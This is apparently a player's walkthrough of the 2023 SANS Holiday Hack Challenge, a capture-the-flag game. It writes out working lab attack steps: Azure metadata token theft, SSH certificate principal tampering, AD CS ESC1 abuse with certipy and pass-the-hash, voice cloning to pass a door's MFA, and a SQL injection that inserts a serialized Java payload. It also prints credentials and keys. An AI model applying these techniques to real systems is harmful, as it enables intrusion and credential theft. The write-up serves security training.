Since we’re here, we might as well handle Noel Boetie’s Reportinator issue as well.
Noel Boetie (Rudolph's Rest Resort):
Hey there, Noel Boetie speaking! I recently tried using ChatNPT to generate my penetration testing report. It's a pretty nifty tool, but there are a few issues in the output that I've noticed. I need some guidance in finding any errors in the way it generated the content, especially those odd hallucinations in the LLM output. I know it's not perfect, but I'd really appreciate the extra eyes on this one. Some of the issues might be subtle, so don't be afraid to dig deep and ask for further clarification if you're unsure. I've heard that you folks are experts about LLM outputs and their common issues, so I trust you can help me with this. Your input will be invaluable to me, so please feel free to share any insights or findings you may have. I'm looking forward to working with you all and improving the quality of the ChatNPT-generated penetration testing report. Thanks in advance for your help! I truly appreciate it! Let's make this report the best it can be!
Reportinator Challenge:
FINDINGS 3, 6, and 9 are False Positives
There is no such port number as 88555.
There is no such HTTP method called SEND.
If you look at the IPs supposedly exposed and then look at the example screenshot, you’ll see that the IPs scanned are 10.136’s and the screenshot is showing 192.168’s. They don’t match.
Great job on completing that challenge! Ever thought about how your newfound skills might come into play later on? Keep that mind sharp, and remember, today's victories are tomorrow's strategies!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Reportinator challenge!
Now that we’ve completed that, let’s head back to Alabaster and see what he’s up to on the Rainraster Cliffs.
Alabaster Snowball (Rainraster Cliffs):
Hello there! Alabaster Snowball at your service. I could use your help with my fancy new Azure server at ssh-server-vm.santaworkshopgeeseislands.org. ChatNPT suggested I upgrade the host to use SSH certificates, such a great idea! It even generated ready-to-deploy code for an Azure Function App so elves can request their own certificates. What a timesaver! I'm a little wary though. I'd appreciate it if you could take a peek and confirm everything's secure before I deploy this configuration to all the Geese Islands servers. Generate yourself a certificate and use the monitor account to access the host. See if you can grab my TODO list. If you haven't heard of SSH certificates, Thomas Bouve gave an introductory talk and demo on that topic recently. Oh, and if you need to peek at the Function App code, there's a handy Azure REST API endpoint which will give you details about how the Function App is deployed.
First, create an ssh key using ssh-keygen. Then, paste your public key into the Function App. It should return an Azure JSON response. Copy the rsa-sha2-512-cert-v01@openssh.com section into a new file and set it to 600 permissions using chmod 600 <file>.pub. You can use ssh -i ./response.pub -i /home/kali/.ssh/id_rsa monitor@ssh-server-vm.santaworkshopgeeseislands.org to ssh into the Satellite Tracker. A simple CTRL+C will drop you out of that and into a shell as monitor. From here, use curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s to get you the access token for the authentication.
Get the subscription information metadata by using curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
From here, we can start building out the URL to get the function app sourcecode.
https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups?api-version=2022-03-01 to pull the resource groups and now it becomes
https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1. We know the app name from the URL, northpole-ssh-certs-fa, so we can pull the source information using RESTER or Curl and the full URL
Get the subscription information metadata by using curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
Open that GitHub link and examine the source code and readme. Source will show you the Default Principle is “elf”. Checking /etc/ssh/auth_principals will show you that alabaster’s principal is admin. So, fire up Burp, paste the same public key in, but intercept the POST and send it to Repeater. Add a comma, then “principal”:”admin” and send it on it’s way.
Lastly, ssh -i ../Desktop/alabaster.pub -i /home/kali/.ssh/id_rsa alabaster@ssh-server-vm.santaworkshopgeeseislands.org will log you in as alabaster and you can finally pull his TODO list with cat alabaster_todo.md
# Geese Islands IT & Security Todo List
- [X] Sleigh GPS Upgrade: Integrate the new "Island Hopper" module into Santa's sleigh GPS. Ensure Rudolph's red nose doesn't interfere with the signal.
- [X] Reindeer Wi-Fi Antlers: Test out the new Wi-Fi boosting antler extensions on Dasher and Dancer. Perfect for those beach-side internet browsing sessions.
- [ ] Palm Tree Server Cooling: Make use of the island's natural shade. Relocate servers under palm trees for optimal cooling. Remember to watch out for falling coconuts!
- [ ] Eggnog Firewall: Upgrade the North Pole's firewall to the new EggnogOS version. Ensure it blocks any Grinch-related cyber threats effectively.
- [ ] Gingerbread Cookie Cache: Implement a gingerbread cookie caching mechanism to speed up data retrieval times. Don't let Santa eat the cache!
- [ ] Toy Workshop VPN: Establish a secure VPN tunnel back to the main toy workshop so the elves can securely access to the toy blueprints.
- [ ] Festive 2FA: Roll out the new two-factor authentication system where the second factor is singing a Christmas carol. Jingle Bells is said to be the most secure.
This makes the answer: Gingerbread.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the SSH/API challenge!
DO NOT LOG OUT OR SHUT DOWN YOUR CONNECTION TO THIS BOX!!! YOU WILL NEED IT FOR THE AD CHALLENGE
Oh my! I was so focused on the SSH configuration I completely missed the vulnerability in the Azure Function App. Why would ChatNPT generate code with such a glaring vulnerability? It's almost like it wanted my system to be unsafe. Could ChatNPT be evil? Thanks for the help, I'll go and update the application code immediately! While we're on the topic of certificates, did you know Active Directory (AD) uses them as well? Apparently the service used to manage them can have misconfigurations too. You might be wondering about that SatTrackr tool I've installed on the monitor account? Here's the thing, on my nightly stargazing adventures I started noticing the same satellite above Geese Islands. I wrote that satellite tracker tool to collect some additional data and sure enough, it's in a geostationary orbit above us. No idea what that means yet, but I'm keeping a close eye on that thing!
Now that this is finished, I return to Coggoggle Marina to speak with Ribb Bonbowford.
Ribb Bonbowford (Coggoggle Marina):
Hello, I'm Ribb Bonbowford. Nice to meet you! Oh golly! It looks like Alabaster deployed some vulnerable Azure Function App Code he got from ChatNPT. Don't get me wrong, I'm all for testing new technologies. The problem is that Alabaster didn't review the generated code and used the Geese Islands Azure production environment for his testing. I'm worried because our Active Directory server is hosted there and Wombley Cube's research department uses one of its fileshares to store their sensitive files. I'd love for you to help with auditing our Azure and Active Directory configuration and ensure there's no way to access the research department's data. Since you have access to Alabaster's SSH account that means you're already in the Azure environment. Knowing Alabaster, there might even be some useful tools in place already.
Re-run the command to generate a new token, but make sure the end url is vault.azure.net. We’re going to use the same path forward as the SSH/API challenge from Alabaster Snowball at the summit of Rainraster Cliffs.
alabaster@ssh-server-vm:~/$ curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fvault.azure.net' -H Metadata:true -s
Drop the new token into RESTER and try hitting https://northpole-it-kv.vault.azure.net/secrets?api-version=7.4 and you’ll find a tmpAddUserScript. That’ll give you an IP, username, and password. In the alabaster folder of the SSH/API machine is impacket. Time to get started.
Domain Controller: 10.0.0.53
Username: elfy
Password: J4`ufC49/J4766\
So, we run GetADUsers.py -all -dc-ip 10.0.0.53 northpole.local/elfy:'J4`ufC49/J4766' and get:
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying 10.0.0.53 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
alabaster 2023-12-31 01:03:30.268972 2023-12-31 20:44:34.506160
Guest <never> <never>
krbtgt 2023-12-31 01:11:07.699459 <never>
elfy 2023-12-31 01:13:38.454967 2023-12-31 20:23:37.191286
wombleycube 2023-12-31 01:13:38.579928 2023-12-31 21:37:53.914370
Next, we enumerate templates with certipy find -u elfy@10.0.0.53 -p 'J4`ufC49/J4766' and we see that the NorthPoleUsers template is vulnerable!!
"[!] Vulnerabilities": {
"ESC1": "'NORTHPOLE.LOCAL\\\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication"
So, we request a new certificate with that template for wombleycube using certipy req -template NorthPoleUsers -ca northpole-npdc01-CA -u elfy@10.0.0.53 -p 'J4`ufC49/J4766' -upn wombleycube@northpole.local then certipy auth -pfx wombleycube.pfx -dc-ip 10.0.0.53 and we get the hash!
alabaster@ssh-server-vm:~/impacket$ certipy auth -pfx wombleycube.pfx -dc-ip 10.0.0.53
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: wombleycube@northpole.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'wombleycube.ccache'
[*] Trying to retrieve NT hash for 'wombleycube'
[*] Got hash for 'wombleycube@northpole.local': aad3b435b51404eeaad3b435b51404ee:5740373231597863662f6d50484d3e23
Use smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:5740373231597863662f6d50484d3e23 wombleycube@10.0.0.53 to pass the hash to the machine, then use FileShare, and lastly grab everything in that share. Inside that share is a “super_secret_research” folder and inside that is
“InstructionsForEnteringSatelliteGroundStation.txt” which is the answer to the objective!
alabaster@ssh-server-vm:~/impacket$ cat InstructionsForEnteringSatelliteGroundStation.txt
Note to self:
To enter the Satellite Ground Station (SGS), say the following into the speaker:
And he whispered, 'Now I shall be out of sight;
So through the valley and over the height.'
And he'll silently take his way.
You will need this for the Access Speaker Challenge!
Wow, nice work. I'm impressed! This is all starting to feel like more than just a coincidence though. Everything Alabaster's been setting up lately with the help of ChatNPT contains all these vulnerabilities. It almost feels deliberate, if you ask me. Now obviously an LLM AI like ChatNPT cannot have deliberate motivations itself. It's just a machine. But I wonder who could have built it and who is controlling it? On top of that, we apparently have a satellite ground station on Geese Islands. I wonder where that thing would even be located. Well, I guess it's probably somewhere on Space Island, but I've not been there yet. I'm not a big fan of jungles, you see. I have this tendency to get lost in them. Anyway, if you feel like investigating, that'd be where I'd go look. Good luck and I'd try and steer clear of ChatNPT if I were you.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the AD Challenge!
Time to explore some more and we sail to The Blacklight District on Film Noir Island and speak to Fitsy Shortstack!
Fitzy Shortstack (The Blacklight District):
Just my luck, I thought... A cybersecurity incident right in the middle of this stakeout. Seems we have a flood of unusual emails coming in through ChatNPT. Got a nagging suspicion it isn’t catching all the fishy ones. You’re our phishing specialist right? Could use your expertise in looking through the output of ChatNPT. Not suggesting a full-blown forensic analysis, just mark the ones screaming digital fraud. We’re looking at all this raw data, but sometimes, it takes a keen human eye to separate the chaff, doesn’t it? I need to get more powdered sugar for my donuts, so do ping me when you have something concrete on this.
Phishing Detective Agency Challenge:
These are pretty easy to spot if you look hard enough.
This one should be Safe because the DKIM key and Received From are correct and match.
This one should be Phishing because while the DKIM key matches, the Received From does not.
This one should be Phishing because while the DKIM key matches, the Received From does not.
This one should be Safe because the DKIM key and Received From are correct and match.
This one should be Safe because the DKIM key and Received From are correct and match.
You've cracked the case! Once again, you've proven yourself to be an invaluable asset in our fight against these digital foes.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Phishing Detection Agency challenge!
Sail onwards, I say. Exploring more we sail into the Tarnished Trove of The Island of Misfit Toys.
Dusty Giftwrap (Tarnished Trove):
Arrr, matey, shiver me timbers! There be buried treasure herrrrre. Just kidding, I'm not really a pirate, I was just hoping it would make finding the treasure easier. I guess you heard about the fabled buried treasure, too? I didn't expect to see anyone else here. This uncharted islet was hard to find. I bet one of these creepy toys has the treasure, and I'm sure not going anywhere near them! If you find the treasure, come back and show me, and I'll tell you what I was able to research about it. Good luck!
Just around with your Detector running and sound on and you’ll find the cartridge.
Whoa, you found it! It's a... video game cartridge? Coooooollll... I mean, arrrrrr.... So, here's what my research uncovered. Not sure what it all means, maybe you can make sense of it. You have all three? I think that makes you ruler of the pirates!
Game Cartridge Vol 2 Challenge:
This one isn’t too terribly difficult. There’s a Math.round(Math.random()).toString() line in script.js and if you run that a couple of times, you’ll see that it just rotates through game0.gb and game1.gb. Copy the js URI and replace everything from /js/ onward with /rom/game0.gb and /rom/game1.gb. Next, from a Linux machine, run
cmp -l game0.gb game1.gb | gawk '{printf "%08X %02X %02X\n", $1, strtonum(0$2), strtonum(0$3)}'
You can also use binwalk -W game0.gb game1.gb to get this output.
You should receive this output that includes 00017C81 02 01. That’s the address that matters. Change the Hex of that address to 02 in the one that isn’t and run it in the BGB Emulator. He’ll still say, “You shall not pass” but you pass right on by. Enter the cave and listen to the audio. It’s Morse code on repeat that spells out GL0RY (that’s a zero).
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Game Cartridge: Vol 2 challenge!
That wraps up The Tarnished Trove. Let’s explore some more and find where else we can get into things. Next stop, Squarewheel Yard.
Garland Candlesticks (Squarewheel Yard):
Hey there, I'm Garland Candlesticks! I could really use your help with something. You see, I have this important pamphlet in my luggage, but I just can't remember the combination to open it! Chris Elgee gave a talk recently that might help me with this problem. Did you attend that? I seem to recall Chris mentioning a technique to figure out the combinations... I have faith in you! We'll get that luggage open in no time. This pamphlet is crucial for me, so I can't thank you enough for your assistance. Once we retrieve it, I promise to treat you to a frosty snack on me!
Luggage Lock Challenge:
Keep Fiddling with the dials until with 3 – clicks on the button. Once the dial says “Dial Resistance” move on to the next wheel.
Wow, you did it! I knew you could crack the code. Thank you so much!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Luggage Lock challenge!
Let’s swing back by Rudolph’s Rest Resort and head into the Lobby
Pepper Minstix (Rudolph’s Rest Resort Lobby):
Well hello there! I’m Pepper Minstix. Say, do you like cotton candy by any chance? I used to own a little cotton candy maker, but I like cotton candy so much that I decided to upgrade. Behold! The Cotton Candy Colossus 2.0. Can I interest you in free cotton candy? What do you say! They are absolutely amazing! Have fun on the Geese Islands! There’s still more to discover – Like sailing your boat along the various coast lines to find new ports, catch some fish, meet new friends, or provide your expertise and assistance where needed. After you complete all the challenges, come back here for a surprise!
Wunorse Openslae (NetWars):
Welcome, brave souls, to the most thrilling cyber quest of the year! Ready your wits and sharpen your skills, for the digital realm awaits! I’m Wunorse, your helper in this festive cyber journey. Whether you’re a seasoned hacker or a budding cyber sleuth, you’re in for an epic experience! As we embark on this adventure, remember, every challenge is a chance to shine brighter! Let’s tackle these puzzles with the joy and teamwork befitting this jolly season! Keep your eyes peeled for clues and your spirits high. In the world of NetWars, every click can lead to wonderful discoveries! May your codes be bug-free and your solutions creative. Let NetWars begin, and may the best cyber elf win! Let the games begin!
No much going on in the Resort Lobby or NetWars Rooms, so we hit the High Seas again and discover the Spaceport Point on Space Island!
Jewel Loggins (Spaceport Point):
What are you doing here, and who are you? Me first? I’m Jewel Loggins. And I was trekking through the jungle and happened to find this place. I liked this spot and decided to set up camp. Seeing you here is quite the surprise. Well, because the only other person I’ve ever seen come here is Wombley Cube. I thought this tram station in the middle of the jungle was strange to begin with, but then Wombley added to the intrigue. I guess all this spy stuff is typical for him, so maybe I shouldn’t think much of it. I’m sure everything’s fine. Every time he comes here, he says something to the speaker. Then, the door opens, and he rides the tram somewhere. I gave it a try, but the door didn’t open for me. Knowing Wombley, it’s some kind of secret passphrase. If you wanna see where the tram goes, I think you need to find out what that passphrase is. Ribb Bonbowford over at Coggoggle Marina on Steampunk Island works with Wombley. Try asking if he knows. I hope you find it. I’ll be here when you get back!
Now that we’ve completed the AD Challenge, Jewel has a bit more to say.
What, you know the passphrase!? Let me try it! Nope, didn't work. Knowing Wombley, the passphrase isn't the only requirement. He's all about that MFA! Oh yeah, multi-factor authentication! The passphrase for something he knows, and his voice for something he is! That's it! You need to be Wombley. You need his voice. Now, ho
w are you gonna get that? Since only us elves can get a subscription to use ChatNPT, try searching for another AI tool that can simulate voices. I'm sure there's one out there.
Space Island Door Access Speaker Challenge:
Sign up for a free plat.HT account and then go to Voice Cloning and upload the audiobook we got from Wombley earlier. Copy the passphrase from the AD challenge that we kept and enter it as one line. Generate and download the audio. Walk up to the door and play the downloaded cloned voice. Easy as 1, 2, 3!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Space Island Door Access Speaker challenge!
Are you like a master spy or something? I've only seen stuff like that in the movies! It sure is scary what you can do with AI, huh? I sure hope ChatNPT has better guardrails in place.
We can now access the locale of Cape Cosmic Inside Fence. We can look around with the telescope, but we need to enter the Satellite building on the far end. Little bit of an Easter Egg, but we know now who our culprit is. Seems Old Jack Frost has returned and is trying to stop Christmas again.
(Zenith SGS):
Hi, I'm Henry! I built the satellites with personalities, and now they keep making dad jokes - whoopsies!
NanoSat-o-Matic (Zenith SGS):
Hi there! I am a Ground station client vending machine. Apparently there is a huge need for NanoSat frameworks here, so they have put me in this room. Here, have a free sample!
Wombley Cube (Satellite Ground Control):
This is Ground Control, do you read me...? Ground Control to – Hey! How'd you get in here? That tram is the only accessible point of entry and I secured it with MFA! No matter, you may have had the skills to find and infiltrate the satellite ground station, but there's no chance you can hack your way into the satellite itself! The nanosat's Supervisor Directory will remain hidden, and you'll never discover the mastermind behind all this. So don't even waste your time trying.
Camera Access Challenge:
Click the Control Panel. Then click the Gator in the bottom-right corner. If you click about, you see: GateXOR is a magical time shifting alligator. For certain challenges GateXOR empowers the adventurer to perform point-in-time Travel or Collapse the specific timeline of the challenge, in order to start the challenge from the beginning. Be warned! While GateXOR tries to help as many concurrent players as possible, this reptile only has so much juice in the tank. If running low on time-energy, GateXOR will let you know that a rest is required and that you'll have to take a short break. P.S. The magical modern dino is here to help and is not to be hacked! In fact if you find a bug, DM Santa's team about it in the Discord channel!
We take that “free sample” and spin up the container on our local machine. We will need to configure WireGuard on it as well based on the config from Time Travel’s output.
GateXOR> [time traveler] please hold, configuring...
###BEGIN###
### This is the server's Wireguard configuration file. Please consider saving it for your record. ###
[Interface]
Address = 10.1.1.1/24
PrivateKey = +NAp4vl8lpgnPqy6pY3eD28ljFl6Y6Fso6Oz7iaabwg=
ListenPort = 51820
[Peer]
PublicKey = 0GamZwS2J97fsonrnUA9vSD43enwnWYk87E58+WIGzw=
AllowedIPs = 10.1.1.2/32
###END####
###BEGIN###
### This is your Wireguard configuration file. Please save it, configure a local Wireguard client, and connect to the Target. ###
[Interface]
Address = 10.1.1.2/24
PrivateKey = uFR+tpKxyZhT1UkmqT98eAdUnmdvO9bSIdj/VixQFmE=
ListenPort = 51820
[Peer]
PublicKey = e39HLFpe26z/E641v0CO0i9UoC6sOqf0VucrIeymB2Q=
Endpoint = 35.184.50.88:51820
AllowedIPs = 10.1.1.1/32
###END####
Use sudo docker exec -it <containerID> bash to access the docker file tree from the host. From here, you can vi /etc/wireguard/wg0.conf and dump the Client WireGuard config in there. Then, wg-quick down wg0 && wg-quick up wg0. Launch the NanoSat MO Base Station Tool and use the maltcp://10.1.1.1:1024/nanosat-mo-supervisor-Directory from the README file to access the satellite. Hit connect to service provider and go to the App Launcher service tab and launch the camera app. Go back to the Communications Settings (Directory) tab and Fetch data again. You should be able to see through the different tabs that it takes Base64 encoded images every 10 seconds. Wireshark is installed as well. If we fire up Wireshark and wait 10 seconds, we should get the image encoded. I saved the pcap and then accessed it from sudo docker cp d74c7e8677c8:/root/imagecap.pcapng ./imagecap.pcapng to get it to my host. Open up the PCAP and follow the TCP stream eq 0 to see the full base64 encoded image. It begins with /9j/ and ends with //9k= and is 1,335,293 characters long (just in case you got lost in the massive b64 string).
So, the 3rd Item on the to-do list is: CONQUER HOLIDAY SEASON! Enter that into your badge and Presto! Challenge complete and a new Diversion Challenge unlocked.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Camera Access challenge!
A fellow sabateur, are you? Or just a misguided hero-wannabe? You think you're saving the holiday season, but you're meddling in something you could never understand! Yes, I sided with Jack, because Santa's betrayed the elves by forcing us to move our operations to these islands! He put the entire holiday season at risk, and I could not allow this, I had to do something. Knowing my skillset, Jack secretly informed me of his plan to show Santa the error of his ways, and recruited me to aid his mission. Why tell you all this? Because it won't change anything. Everything is already in motion, and you're too late. Plus, the satellite is state-of-the-art, and -- oh drat, did I leave the admin tools open? For some reason, I can't move when you're nearby, but if I could, I would surely stop you!
Missile Diversion Challenge:
Jumping back to the Satellite Tool, we stop the camera app and start the missile-targeting-system one. Looking into the Action Service tab we see a Debug action. Looking at the Published Parameter Values tab we see that it’s a MariaDB on the back end. Time for some old-fashioned SQL Injection. Submit the debug action changing the Attribute Value to ;SHOW TABLES and submit it, then jump to the Parameter Service tab and hit getValue on Debug.
Repeat with ;SELECT * FROM <table_name> for each table name
And when we use SELECT on satellite_query
select * from satellite_query
jid: 1 | object: ........sr..SatelliteQueryFileFolderUtility.......................Z..isQueryZ..isUpdateL..pathOrStatementt..Ljava/lang/String;xp..t.)/opt/SatelliteQueryFileFolderUtility.java | results:
import java.io.Serializable;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import java.sql.*;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import com.google.gson.Gson;
public class SatelliteQueryFileFolderUtility implements Serializable {
private String pathOrStatement;
private boolean isQuery;
private boolean isUpdate;
public SatelliteQueryFileFolderUtility(String pathOrStatement, boolean isQuery, boolean isUpdate) {
this.pathOrStatement = pathOrStatement;
this.isQuery = isQuery;
this.isUpdate = isUpdate;
}
public String getResults(Connection connection) {
if (isQuery && connection != null) {
if (!isUpdate) {
try (PreparedStatement selectStmt = connection.prepareStatement(pathOrStatement);
ResultSet rs = selectStmt.executeQuery()) {
List<HashMap<String, String>> rows = new ArrayList<>();
while(rs.next()) {
HashMap<String, String> row = new HashMap<>();
for (int i = 1; i <= rs.getMetaData().getColumnCount(); i++) {
String key = rs.getMetaData().getColumnName(i);
String value = rs.getString(i);
row.put(key, value);
}
rows.add(row);
}
Gson gson = new Gson();
String json = gson.toJson(rows);
return json;
} catch (SQLException sqle) {
return "SQL Error: " + sqle.toString();
}
} else {
try (PreparedStatement pstmt = connection.prepareStatement(pathOrStatement)) {
pstmt.executeUpdate();
return "SQL Update completed.";
} catch (SQLException sqle) {
return "SQL Error: " + sqle.toString();
}
}
} else {
Path path = Paths.get(pathOrStatement);
try {
if (Files.notExists(path)) {
return "Path does not exist.";
} else if (Files.isDirectory(path)) {
// Use try-with-resources to ensure the stream is closed after use
try (Stream<Path> walk = Files.walk(path, 1)) { // depth set to 1 to list only immediate contents
return walk.skip(1) // skip the directory itself
.map(p -> Files.isDirectory(p) ? "D: " + p.getFileName() : "F: " + p.getFileName())
.collect(Collectors.joining("\n"));
}
} else {
// Assume it's a readable file
return new String(Files.readAllBytes(path), StandardCharsets.UTF_8);
}
} catch (IOException e) {
return "Error reading path: " + e.toString();
}
}
}
public String getpathOrStatement() {
return pathOrStatement;
}
}
So, this looks like a serialization thing, but let me see if I can get the column names.
And show grants gives us
Looking at the object, we need to craft a new payload for the SQLi. The object from the code, plus an UPDATE missile_targeting_system.pointing_mode SET numerical_mode = 1 WHERE id = 1, encoded and compiled so that the class would accept it.
;INSERT INTO satellite_query (jid, object) VALUES (2, from_base64("rO0ABXNyAB9TYXRlbGxpdGVRdWVyeUZpbGVGb2xkZXJVdGlsaXR5EtT2jQ6zkssCAANaAAdpc1F1ZXJ5WgAIaXNVcGRhdGVMAA9wYXRoT3JTdGF0ZW1lbnR0ABJMamF2YS9sYW5nL1N0cmluZzt4cAEBdABRVVBEQVRFIG1pc3NpbGVfdGFyZ2V0aW5nX3N5c3RlbS5wb2ludGluZ19tb2RlIFNFVCBudW1lcmljYWxfbW9kZSA9IDEgV0hFUkUgaWQgPSAx"));
Run that in the Debug parameter and BOOM! Missile Diverted.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Mission Diversion challenge!
A... missile... aimed for Santa's sleigh? I had no idea... I can't believe I was manipulated like this. I've been trained to recognize these kinds of tactics! Santa should never have put the holiday season at risk like he did, but I didn't know Jack's true intentions. I'll help you bring Jack to justice... But my mission to ensure Santa never again compromises the holidays is still in progress. It sounded like the satellite crashed. Based on the coordinates, looks like the crash site is right near Rudolph's Rest. Use the door to the right to return to the resort lobby and see what happened! Don't worry, I'll meet you there... trust me.
https://hhc23-prod-sat-video-dot-holidayhack2023.ue.r.appspot.com/?&challenge=finaldoor
Once the video is through the door to the right bursts open and I am Christmas Magically transported to the Rudolph’s Rest Resort Lobby and Santa, a couple of Trolls, Jack Frost (along with his crashed and busted escape pod), and all 6 Geese A- Lei’ing (who still aren’t very talkative).
Santa (Rudolph’s Rest Resort Lobby Finale):
You've done it! You've saved me and my sleigh from Jack Frost's dastardly plan! I must admit, it's astonishing the lengths Jack will go to in order to try and stop the holiday season. Even after being banished from Earth, he managed to create an AI to social engineer us into moving our holiday operations to the Geese Islands, putting us right in the path of his satellite. And to think he even recruited one of my dear elves... I never saw that coming. Oh, Wombley... But thanks to your incredible efforts, we've proof that Jack violated his parole, and the chances of him interfering with the holidays ever again are all but impossible! I can't thank you enough for your help in protecting the magic and joy of this special time of year. I'd like to wish you a most wonderful holiday season, no matter where you may be on Earth or what the weather is like. Keep that holiday spirit alive, my friend, and remember: a little change now and then can lead to something magical! Ho ho ho, happy holidays!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the You Won! challenge!
Troll (Rudolph's Rest Resort Lobby Finale):
Thank you so much! We assure you and Santa Clause that Jack Frost will be brought to justice!
Jack Frost (Rudolph's Rest Resort Lobby Finale):
Okay, listen up, yes I've been caught, but let me tell you, my plan was incredible, I mean really incredible. I and the trolls created ChatNPT, a fantastic AI, and left it behind in the North Pole in 2021 to trick Santa into moving to the Geese Islands. It worked like a charm, perfectly perfect. My satellite was geostationary, right over the islands to maintain comms with ChatNPT, and Wombley in the gound station. It was genius. Absolute genius, really. I was reviewing all the prompts as they were sent, and changing the responses in real time thanks to Santa's operation moving to the Geese Islands. This was very smart. Very, very, very smart, very efficient. And Wombley, the elf, joining me? Easy. He was so easy to convince. You see, there's a big, big dissent in Santa's ranks, huge. The elves, they're not happy with Santa. Mark my words, even if I don't stop Santa, his own elves will. It's going to be tremendous, this you will see.
Left Troll (Rudolph’s Rest Resort Lobby Finale):
Relax, bub. We're just here for Jack Frost. He broke Frostian and Earth law. The most important condition of his parole agreement was that he’d never set foot on Earth again. To evade the missile, his ejection pod landed on Geese Islands, so he’s back on earth, violating the explicit terms of his parole. Don't care he wouldn't have done it if the missile coordinates weren't tampered with. Rules are rules. Jack's time on Earth is finally up. We're taking him back. Frostian justice waits for no one. Not even Jack. End of story. And I just really want to be able to boss him around for a change. Keh heh heh.
Heading back to Squarewheel Yard, we stop to speak to Poinsettia McMittens.
Poinsettia McMittens (Squarewheel Yard):
Excuse me, but you're interrupting my fishing serenity. Oh, you'd like to know how to become as good at fishing as I am? Well, first of all, thank you for noticing my flair for fishing. It's not just about looking good beside the lake, you know. The key is in the details, much like crafting the perfect toy. Observe the water, the weather, and the fish’s habits - it's a science and an art. Of course, it helps to have a natural charm. Fish seem to find me irresistible. Must be my sparkling personality... or maybe it's just the glitter of my allure. Oh, the mysteries of the aquatic life around these islands are as elusive as, well, a clever compliment. But you'll get one if you probe enough. Remember, patience is more than a virtue in fishing; it’s a strategy. Like waiting for the right time to use flattery, you wait for the right moment to strike. Go see if you can catch, say, 20 different types of fish!
After all is said and done, I might as well get some fishing in. I travel the Geese Islands and fish at all the docks. Finally, I fill my Pescadex with the 20 different types of fish.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the BONUS! Fishing Guide challenge!
Hoy small fry, nice work! Now, just imagine if we had an automatic fish catcher? It would be as ingenious as me on a good day! I came across this fascinating article about such a device in a magazine during one of my more glamorous fishing sessions. If only I could get my hands on it, I'd be the undisputed queen of catching them all!
So apparently there are more than 20 different types of fish. There’s 171. Just keep fishing away. I heard some people say they scripted it, but after the Java and mariaDB 9 layers of Hell, it was worth just leisurely floating along fishing away. You have this lovely Pokedex…..um.. I meant, Pescadex! Gotta Catch Em ALL!
However, if we did want to script it, in Developer Tools > Console, switch to Ahoy! (bottom right) and paste this into the console:
// code-llama-34b autofisher
// Get references to the buttons
var castLineButton = document.querySelector(".castreel");
var reelItInButton = document.querySelector(".reelitin");
// Set up the interval to run the code every 10 seconds
setInterval(function() {
// Check if the Reel it in button has the gotone class
// Check if the Reel it in button has the style="display: none" attribute
if (reelItInButton.hasAttribute("style") && reelItInButton.getAttribute("style").indexOf("display: none") !== -1) {
// Click the Cast Line button
castLineButton.click();
}
else if (reelItInButton.classList.contains("gotone")) {
// Click the Reel it in button
reelItInButton.click();
}
}, 500);
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the BONUS! Fishing Mastery challenge!
You managed to catch every fish? You're like the fishing version of a Christmas miracle! Now, if only you could teach me your ways... but then again, I'm already pretty fabulous at everything I do.
So here is where our time together has ended. It’s time to head back to “civilization.” I didn’t get much of a vacation, but I was able to learn a bit more about Azure Rest APIs, Debug SQLi, and more Hex editing. Bonus, I did save Christmas (again!) from Jack. Hopefully the Frostians will finally bury him under their jails. He’s such a troublemaker. What’s to become of ole’ Wombley Cube? Well, that’s a story for another time.
Alla Nostra! That’s Italian for “To our health”. Farewell.
Story Narrative:
Just sit right back and you’ll hear a tale,
A tale of a yuletide trip
That started from a tropic port,
Aboard this tiny ship
Santa and his helpful elves
To Geese Islands did go
Continuing their merry work
O'er sand instead of snow
New this year: a shiny tool
The elves logged in with glee
What makes short work of many tasks?
It's ChatNPT. It's ChatNPT
From images to APIs
This AI made elves glad
But motivations were unknown
So was it good or bad?
Could it be that NPT
Was not from off-the-shelf?
Though we'll forgive and trust again
We'd found a naughty elf
This fancy AI tool of ours
With all our work remained
Not good or bad, our online friend
Just did as it was trained
Surely someone's taint must be
Upon our AI crutch
Yes indeed, this bold new world
Bore Jack Frost's icy touch
Though all's returned to steady state
There's one thing that we know
We'll all be needed once again
When Santa's back on snow
TALKS:
Welcome to the 2023 SANS Holiday Hack Challenge
Speaker(s): Ed Skoudis
In this brief video, Ed Skoudis welcomes you to this year's Holiday Hack Challenge.
Click here to watch this talk!
Lock Talk
Speaker(s): Chris Elgee
Join Chris as he talks locks and penetration testing.
Click here to watch this talk!
Certifiably Secure & Slightly Shell-arious. A Whimsical Intro to Secure Shell Certificates
Speaker(s): Thomas Bouve
A practical introduction to secure shell certificates and how to upgrade your existing SSH server configuration.
Click here to watch this talk!
Introduction to Space System Vulnerabilities
Speaker(s): Henry Reed
